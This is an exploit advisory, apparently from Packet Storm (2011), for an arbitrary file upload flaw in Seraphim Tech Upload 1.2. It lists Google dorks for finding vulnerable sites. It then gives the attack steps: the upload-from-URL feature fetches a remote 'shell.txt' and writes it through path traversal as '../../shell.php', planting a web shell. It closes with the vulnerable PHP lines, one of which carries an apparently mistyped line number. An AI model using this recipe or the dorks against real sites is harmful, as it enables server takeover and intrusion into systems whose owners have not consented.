Seraphim Tech Upload 1.2 Shell Upload

2011-11-14T00:00:00
ID PACKETSTORM:106965
Type packetstorm
Reporter fr0zen_roads
Modified 2011-11-14T00:00:00

Description

                                        
                                            `------------------------------------------------------------------  
Seraphim Tech upload 1.2 :: Arbitrary File Upload  
------------------------------------------------------------------  
[0x00]  
# Site : http://www.seraphimtech.net  
# Get From : http://www.seraphimtech.net/repository/uploadv1_2.zip  
  
# Google Dork : intext:"Developed By seraphimtech.net"  
# Google Dork : inurl:uploadurl.php  
  
[0x01]  
# Author : Fr0zen_roads  
# Contact: Fr0zen_roads[@]Y!  
  
  
  
[0x02]  
# vulnerable Details  
Url : http://Site/[path]/uploadurl.php  
  
Upload From URL: http://me.you/shell.txt   
New File: ../../shell.php  
  
  
[0x03]  
/procces.php  
Line:  
293 fwrite($resource,date("Ymd h:i:s")." UPLOAD FILE FROM URL - $_SERVER[REMOTE_ADDR]".$_REQUEST['userurl']." to ".$_REQUEST['newuserfile']."\n");  
394 fclose($resource);  
295 $urlfile = $_REQUEST['userurl'];  
296 $urlnewfile = $_REQUEST['newuserfile'];  
297 $message=do_urlupload($upload_dir, $urlfile,$urlnewfile);  
  
  
EOF  
`